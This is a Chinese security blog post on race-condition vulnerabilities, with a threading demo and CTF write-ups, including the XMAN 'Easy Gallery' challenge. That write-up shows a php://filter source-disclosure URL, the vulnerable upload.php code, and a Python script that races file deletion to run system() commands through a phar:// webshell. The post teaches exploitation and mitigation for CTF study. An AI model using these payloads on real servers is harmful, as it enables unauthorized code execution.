<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="条件竞争"><meta name="keywords" content="文件上传,条件竞争"><meta name="author" content="V0WKeep3r,v0wldl@163.com"><meta name="copyright" content="V0WKeep3r"><title>条件竞争 | V0W's Blog</title><link rel="shortcut icon" href="/favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '5.2.0'
} </script><meta name="generator" content="Hexo 5.2.0"><link rel="alternate" href="/atom.xml" title="V0W's Blog" type="application/atom+xml">
</head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%9D%A1%E4%BB%B6%E7%AB%9E%E4%BA%89"><span class="toc-text">条件竞争</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x01-%E6%BC%8F%E6%B4%9E%E7%AE%80%E4%BB%8B"><span class="toc-text">0x01 漏洞简介</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x02-%E6%BC%8F%E6%B4%9E%E5%AE%9E%E6%88%98"><span class="toc-text">0x02 漏洞实战</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x03-%E6%9D%A1%E4%BB%B6%E7%AB%9E%E4%BA%89%E5%9C%A8CTF%E4%B8%AD%E7%9A%84%E8%BF%90%E7%94%A8"><span class="toc-text">0x03 条件竞争在CTF中的运用</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0-%E6%9D%A1%E4%BB%B6%E7%AB%9E%E4%BA%89"><span class="toc-text">1.文件上传+条件竞争</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-Session-%E6%9D%A1%E4%BB%B6%E7%AB%9E%E4%BA%89"><span class="toc-text">2.Session+条件竞争</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-XMAN-Easy-Gallery"><span class="toc-text">3. XMAN-Easy Gallery</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x05-%E6%80%BB%E7%BB%93%E4%BB%A5%E5%8F%8A%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D"><span class="toc-text">0x05 总结以及漏洞修复</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0xff-%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5"><span class="toc-text">0xff 参考链接</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/Kaneki.jpg"></div><div class="author-info__name text-center">V0WKeep3r</div><div class="author-info__description text-center">Stay Hungry, Stay Foolish.</div><div class="follow-button"><a target="_blank" rel="noopener" href="https://github.com/qingchenldl">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">58</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">31</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">11</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">友链</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://zhuxianjin.github.io/">J0k3r</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://p0desta.com/">p0desta</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://daolgts.github.io/">dlgts</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://iwenhu.cn/">mengchen</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://p0sec.net/">p0</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://asa9ao.xyz/">唯湖</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://seaii-blog.com/">seaii</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://wzt.ac.cn/">WCatalpa.T</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://syf.ac.cn/">7N1ght</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://www.nicefish.top/posts/">nicefish</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://flag0.com/">GetFlag</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(/img/index.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">V0W's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">主页</a><a class="site-page" href="/archives">文章</a><a class="site-page" href="/tags">标签</a><a class="site-page" href="/categories">分类</a><a class="site-page" href="/about">关于我</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> 搜索</span></a></span></div><div id="post-info"><div id="post-title">条件竞争</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2018-08-16</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/Web%E5%AE%89%E5%85%A8/">Web安全</a><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">1.8k</span><span class="post-meta__separator">|</span><span>阅读时长: 7 分钟</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h1 id="条件竞争"><a href="#条件竞争" class="headerlink" title="条件竞争"></a>条件竞争</h1><p>在之前一个比赛遇到过，但是一直不会做，所以参考多位大佬的博客，记录一下，希望下次遇到的时候能够做出来。</p>
<h1 id="0x01-漏洞简介"><a href="#0x01-漏洞简介" class="headerlink" title="0x01 漏洞简介"></a>0x01 漏洞简介</h1><blockquote>
<p>条件竞争是指一个系统的运行结果依赖于不受控制的事件的先后顺序。当这些不受控制的事件并没有按照开发者想要的方式运行时，就可能会出现 bug。尤其在当前我们的系统中大量对资源进行共享，如果处理不当的话，就会产生条件竞争漏洞。</p>
</blockquote>
<p>上面的解释太官方了，我的理解是：</p>
<p><strong>程序在运用多线程时，没有做好线程同步，导致产生非预期结果。</strong></p>
<blockquote>
<p>竞争条件”发生在多个线程同时访问同一个共享代码、变量、文件等没有进行锁操作或者同步操作的场景中。  ——Wikipedia-computer_science</p>
</blockquote>
<p>这在我学习完《操作系统》后是很好理解的。</p>
<p>举个例子：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">#-*-coding:utf-8-*-</span><br><span class="line">import threading</span><br><span class="line">COUNT &#x3D; 0</span><br><span class="line"></span><br><span class="line">def Run(threads_name):</span><br><span class="line">    global COUNT</span><br><span class="line">    read_value &#x3D; COUNT</span><br><span class="line">    print &quot;COUNT in Thread-%s is %d&quot; % (str(threads_name), read_value)</span><br><span class="line">    COUNT &#x3D; read_value + 1</span><br><span class="line"></span><br><span class="line">def main():</span><br><span class="line">    threads &#x3D; []</span><br><span class="line">    for j in range(10):</span><br><span class="line">        t &#x3D; threading.Thread(target&#x3D;Run,args&#x3D;(j,))</span><br><span class="line">        threads.append(t)</span><br><span class="line">        t.start()</span><br><span class="line">    for i in range(len(threads)):</span><br><span class="line">        threads[i].join()</span><br><span class="line">    print(&quot;Finally, The COUNT is %d&quot; % (COUNT,))</span><br><span class="line"></span><br><span class="line">if __name__ &#x3D;&#x3D; &#39;__main__&#39;:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>
<p>运行结果如下：<br><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180823/GeE49mcK08.png?imageslim" alt="mark"></p>
<p>按照我们的预想，结果应该都是<code>10</code>，但是发现结果可能存在<strong>非预期解</strong>，并且出现非预期的概率还挺大的。</p>
<p>这是什么原因呢？</p>
<p>原因就在于我们没有对变量<code>COUNT</code>做同步制约，导致可能Thread-7在读<code>COUNT</code>,还没来得及更改<code>COUNT</code>,Thread-8抢夺资源，也来读<code>COUNT</code>,并且将<code>COUNT</code>修改为<code>它读的结果+1</code>，由此出现非预期。</p>
<p>同样的，WEB应用程序因为要为很多用户服务，势必要采用多线程，但是，如果种种原因导致线程间的同步机制没处理好，那么也就会导致非预期和条件竞争的漏洞。</p>
<h1 id="0x02-漏洞实战"><a href="#0x02-漏洞实战" class="headerlink" title="0x02 漏洞实战"></a>0x02 漏洞实战</h1><h1 id="0x03-条件竞争在CTF中的运用"><a href="#0x03-条件竞争在CTF中的运用" class="headerlink" title="0x03 条件竞争在CTF中的运用"></a>0x03 条件竞争在CTF中的运用</h1><h2 id="1-文件上传-条件竞争"><a href="#1-文件上传-条件竞争" class="headerlink" title="1.文件上传+条件竞争"></a>1.文件上传+条件竞争</h2><p>一般是上传文件，绕过防护之后，小马又会被立马删除。<br>但是由于文件存在过，我们可以利用python脚本不断访问shell，这样就形成了<code>python脚本</code>和<code>web删除程序</code>之间的竞争，一定的测试量后，可以竞争到资源，执行shell，从而得到flag。</p>
<p>CUMT平台上有一道经典例题，但是这个环境关了，于是我也只是看了看WP，参考<a target="_blank" rel="noopener" href="http://iwenhu.cn/2018/04/07/Race-Condition/">这篇大佬的博客</a></p>
<h2 id="2-Session-条件竞争"><a href="#2-Session-条件竞争" class="headerlink" title="2.Session+条件竞争"></a>2.Session+条件竞争</h2><p><a target="_blank" rel="noopener" href="http://iwenhu.cn/2018/04/07/Race-Condition/">0CTF2018中的一个题</a></p>
<blockquote>
<p>服务器通过session对请求顺序建立了锁，因此我们需要多个session，使用两个浏览器登录同一个账户即可。在将IP改为8.8.8.8时，有短时间的网络请求堵塞，我们在这个时间段，使用另一个session提交请求，即可通过验证，成功将IP改为8.8.8.8，然后获得flag。</p>
</blockquote>
<h2 id="3-XMAN-Easy-Gallery"><a href="#3-XMAN-Easy-Gallery" class="headerlink" title="3. XMAN-Easy Gallery"></a>3. XMAN-Easy Gallery</h2><p>这道题我做了==、</p>
<p>首先php伪协议读源码</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">http:&#x2F;&#x2F;202.112.51.184:8004&#x2F;index.php?page&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;upload</span><br></pre></td></tr></table></figure>
<p>upload.php</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&lt;html lang&#x3D;&quot;zh-CN&quot;&gt;</span><br><span class="line">  &lt;head&gt;</span><br><span class="line">    &lt;meta charset&#x3D;&quot;utf-8&quot;&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">$error&#x3D;$_FILES[&#39;pic&#39;][&#39;error&#39;];</span><br><span class="line">$tmpName&#x3D;$_FILES[&#39;pic&#39;][&#39;tmp_name&#39;];</span><br><span class="line">$name&#x3D;$_FILES[&#39;pic&#39;][&#39;name&#39;];</span><br><span class="line">$size&#x3D;$_FILES[&#39;pic&#39;][&#39;size&#39;];</span><br><span class="line">$type&#x3D;$_FILES[&#39;pic&#39;][&#39;type&#39;];</span><br><span class="line">try&#123;</span><br><span class="line">	if($name!&#x3D;&#x3D;&quot;&quot;)</span><br><span class="line">	&#123;</span><br><span class="line">		$name1&#x3D;substr($name,-4);</span><br><span class="line">		if(($name1!&#x3D;&#x3D;&quot;.gif&quot;) and ($name1!&#x3D;&#x3D;&quot;.jpg&quot;))</span><br><span class="line">		&#123;</span><br><span class="line">			echo &quot;hehe&quot;;</span><br><span class="line">			echo &quot;&lt;script language&#x3D;javascript&gt;alert(&#39;不允许的文件类型！&#39;);history.go(-1)&lt;&#x2F;script&gt;&quot;;</span><br><span class="line">			exit;</span><br><span class="line">		&#125;</span><br><span class="line">		if($type!&#x3D;&#x3D;&quot;image&#x2F;jpeg&quot;&amp;&amp;$type!&#x3D;&#x3D;&quot;image&#x2F;gif&quot;)</span><br><span class="line">		&#123;</span><br><span class="line">			echo mime_content_type($tmpName);</span><br><span class="line">			echo &quot;&lt;script language&#x3D;javascript&gt;alert(&#39;不允许的文件类型！&#39;);history.go(-1)&lt;&#x2F;script&gt;&quot;;</span><br><span class="line">			exit;</span><br><span class="line">		&#125;</span><br><span class="line">		if(is_uploaded_file($tmpName))&#123;</span><br><span class="line">			$time&#x3D;time();</span><br><span class="line">			$rootpath&#x3D;&#39;uploads&#x2F;&#39;.$time.$name1;</span><br><span class="line">			if(!move_uploaded_file($tmpName,$rootpath))&#123;</span><br><span class="line">				echo &quot;&lt;script language&#x3D;&#39;JavaScript&#39;&gt;alert(&#39;文件移动失败!&#39;);window.location&#x3D;&#39;index.php?page&#x3D;submit&#39;&lt;&#x2F;script&gt;&quot;;</span><br><span class="line">				exit;</span><br><span class="line">			&#125;</span><br><span class="line">			else&#123;</span><br><span class="line">				sleep(5);</span><br><span class="line">				if ($type&#x3D;&#x3D;&#39;image&#x2F;jpeg&#39;)</span><br><span class="line">				&#123;</span><br><span class="line">					$im &#x3D; @imagecreatefromjpeg($rootpath);</span><br><span class="line">					if(!$im)&#123;</span><br><span class="line">					  $im &#x3D; imagecreatetruecolor(150, 30);</span><br><span class="line">					  $bg &#x3D; imagecolorallocate($im, 255, 255, 255);</span><br><span class="line">					  $text_color &#x3D; imagecolorallocate($im, 0, 0, 255);</span><br><span class="line">					  imagefilledrectangle($im, 0, 0, 150, 30, $bg);</span><br><span class="line">					  imagestring($im, 3, 5, 5, &quot;Error loading image&quot;, $text_color);</span><br><span class="line">					&#125; else &#123;</span><br><span class="line">						$time&#x3D;time();</span><br><span class="line">						$new_rootpath&#x3D;&#39;uploads&#x2F;&#39;.$time.$name1;</span><br><span class="line">						imagejpeg($im,$new_rootpath);</span><br><span class="line">					&#125;</span><br><span class="line">				&#125;</span><br><span class="line">				else if ($type&#x3D;&#x3D;&#39;image&#x2F;gif&#39;)</span><br><span class="line">				&#123;</span><br><span class="line">					$im &#x3D; @imagecreatefromgif($rootpath);</span><br><span class="line">					if(!$im)&#123;</span><br><span class="line">					  $im &#x3D; imagecreatetruecolor(150, 30);</span><br><span class="line">					  $bg &#x3D; imagecolorallocate($im, 255, 255, 255);</span><br><span class="line">					  $text_color &#x3D; imagecolorallocate($im, 0, 0, 255);</span><br><span class="line">					  imagefilledrectangle($im, 0, 0, 150, 30, $bg);</span><br><span class="line">					  imagestring($im, 3, 5, 5, &quot;Error loading image&quot;, $text_color);</span><br><span class="line">					&#125; else &#123;</span><br><span class="line">						$time&#x3D;time();</span><br><span class="line">						$new_rootpath&#x3D;&#39;uploads&#x2F;&#39;.$time.$name1;</span><br><span class="line">						imagegif($im,$new_rootpath);</span><br><span class="line">					&#125;</span><br><span class="line">				&#125;</span><br><span class="line">				unlink($rootpath);</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">		echo &quot;图片ID：&quot;.$time;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">catch(Exception $e)</span><br><span class="line">&#123;</span><br><span class="line">	echo &quot;ERROR&quot;;</span><br><span class="line">&#125;</span><br><span class="line">&#x2F;&#x2F;</span><br><span class="line"> ?&gt;</span><br><span class="line"> &lt;&#x2F;html&gt;</span><br></pre></td></tr></table></figure>
<p>首先是上传的一些判断<br>之后会验证图像是否正确载入<br>如果上传了正确的图片，<code>imagecreatefromjpeg()</code>返回图像资源，文件名更换为新的时间戳，用新的文件路径<code>$new_rootpath</code>输出图片，最后删除原文件<code>unlink($rootpath);</code><br>如果上传了不正确的图片，不会更换新的文件路径，最后还要删除源文件<code>unlink($rootpath);</code><br>看上去没问题，但是上传完文件执行了<code>sleep(5);</code>，所以上传的文件即使验证不成功也有5秒钟的时间存在，所以在五秒钟的时间内利用就可以.</p>
<p>一边用<code>Burp Intruer</code>发包<br><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180824/a5EH2kgaaJ.png?imageslim" alt="mark"></p>
<p>一边用python脚本就访问链接，会存在没被删除的，从而利用getshell</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line">id &#x3D; int(time.time())</span><br><span class="line">s&#x3D;requests.session()</span><br><span class="line">data0&#x3D;&#123;&#39;v&#39;:&quot;phpinfo();&quot;,&#125;</span><br><span class="line">data1&#x3D;&#123;</span><br><span class="line">    &#39;v&#39;:&quot;system(&#39;ls&#39;);&quot;</span><br><span class="line">&#125;</span><br><span class="line">data2&#x3D;&#123;</span><br><span class="line">    &#39;v&#39;:&quot;system(&#39;cat xxxxxxxxxasdasf_flag.php&#39;);&quot;</span><br><span class="line">&#125;</span><br><span class="line">while 1:</span><br><span class="line">    for i in range(id-50,id+50):</span><br><span class="line">        url &#x3D; &#39;http:&#x2F;&#x2F;202.112.51.184:9005&#x2F;index.php?page&#x3D;phar:&#x2F;&#x2F;.&#x2F;uploads&#x2F;&#39; + str(i) + &#39;.jpg&#x2F;v&#39;</span><br><span class="line">        t&#x3D;s.post(url,data&#x3D;data1).content</span><br><span class="line">        print i</span><br><span class="line">        if &#39;flag&#39; in t:</span><br><span class="line">            print t</span><br><span class="line">            break</span><br><span class="line">while 1:</span><br><span class="line">    for i in range(id-50,id+50):</span><br><span class="line">        url &#x3D; &#39;http:&#x2F;&#x2F;202.112.51.184:9005&#x2F;index.php?page&#x3D;phar:&#x2F;&#x2F;.&#x2F;uploads&#x2F;&#39; + str(i) + &#39;.jpg&#x2F;v&#39;</span><br><span class="line">        t&#x3D;s.post(url,data&#x3D;data1).content</span><br><span class="line">        print i</span><br><span class="line">        if &#39;flag&#39; in t:</span><br><span class="line">            print t</span><br><span class="line">            break</span><br><span class="line"># XMAN&#123;Rush_Rush_oo000&#125;</span><br></pre></td></tr></table></figure>


<h1 id="0x05-总结以及漏洞修复"><a href="#0x05-总结以及漏洞修复" class="headerlink" title="0x05 总结以及漏洞修复"></a>0x05 总结以及漏洞修复</h1><p>条件竞争漏洞产生的很大一部分原因是程序不严谨，对于并发操作没有做好同步制约，毕竟开发者在进行代码开发的时候，常常倾向于代码会以线性的方式执行，而并行服务器会同时执行多个线程，这就会导致意想不到的结果。</p>
<p>条件竞争漏洞的修复主要看开发者，以上述的Web漏洞为例：</p>
<ol>
<li>对于数据库的操作，比较正统的方法是设置锁</li>
<li>对于文件上传，“引狼入室”的方法不可取，最好先进行充分的检测，再上传到服务器。</li>
</ol>
<h1 id="0xff-参考链接"><a href="#0xff-参考链接" class="headerlink" title="0xff 参考链接"></a>0xff 参考链接</h1><ol>
<li><a target="_blank" rel="noopener" href="https://blog.csdn.net/u011377996/article/details/79511160">小结一下Web的条件竞争的题目</a></li>
<li><a target="_blank" rel="noopener" href="http://iwenhu.cn/2018/04/07/Race-Condition/">条件竞争（Race Condition） </a></li>
<li><a target="_blank" rel="noopener" href="http://seaii-blog.com/index.php/2017/04/26/49.html">Web中的条件竞争漏洞</a></li>
</ol>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:v0wldl@163.com">V0WKeep3r</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://v0w.top/2018/08/16/条件竞争/">http://v0w.top/2018/08/16/条件竞争/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://v0w.top">V0W's Blog</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/">文件上传</a><a class="post-meta__tags" href="/tags/%E6%9D%A1%E4%BB%B6%E7%AB%9E%E4%BA%89/">条件竞争</a></div><div class="post-qr-code"><div class="post-qr-code-item"><img class="post-qr-code__img" src="/img/AlipayQR.png"><div class="post-qr-code__desc">支付宝打赏</div></div><div class="post-qr-code-item"><img class="post-qr-code__img" src="/img/wechatQR.png"><div class="post-qr-code__desc">微信打赏</div></div></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2018/08/16/XSS%E5%8E%9F%E7%90%86%E5%8F%8A%E5%A4%8D%E7%8E%B0/"><i class="fa fa-chevron-left">  </i><span>XSS漏洞原理&amp;复现</span></a></div><div class="next-post pull-right"><a href="/2018/08/14/TJCTF%20WP/"><span>TJCTF2018 WP</span><i class="fa fa-chevron-right"></i></a></div></nav><div id="vcomment"></div><script src="https://cdn1.lncld.net/static/js/3.0.4/av-min.js"></script><script src="https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js"></script><script>var notify = 'false' == 'true';
var verify = 'false' == 'true';
var record_ip = 'false' == 'true';
var GUEST_INFO = ['nick','mail','link'];
var guest_info = 'nick,mail,link'.split(',').filter(function(item){
  return GUEST_INFO.indexOf(item) > -1
});
guest_info = guest_info.length == 0 ? GUEST_INFO :guest_info;
window.valine = new Valine({
  el:'#vcomment',
  notify:notify,
  verify:verify,
  recordIP:record_ip,
  appId:'xuqLRcah5FaInOgKRdj9JB3V-gzGzoHsz',
  appKey:'8vMPXnFoh7Fih1g29jw4JNxl',
  placeholder:'师傅可以留下你的评论和邮箱，V0W能够通过邮件get并回复哦～',
  avatar:'retro',
  guest_info:guest_info,
  pageSize:'10',
  lang: 'zh-cn'
})</script></div></div><footer class="footer-bg" style="background-image: url(/img/index.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2018 - 2020 By V0WKeep3r</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.0"></script><script src="/js/fancybox.js?version=1.9.0"></script><script src="/js/sidebar.js?version=1.9.0"></script><script src="/js/copy.js?version=1.9.0"></script><script src="/js/fireworks.js?version=1.9.0"></script><script src="/js/transition.js?version=1.9.0"></script><script src="/js/scroll.js?version=1.9.0"></script><script src="/js/head.js?version=1.9.0"></script><script src="/js/search/local-search.js"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a target="_blank" rel="noopener" href="https://github.com/wzpan/hexo-generator-search" style="color:#49B1F5;">hexo-generator-search</a>
 <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>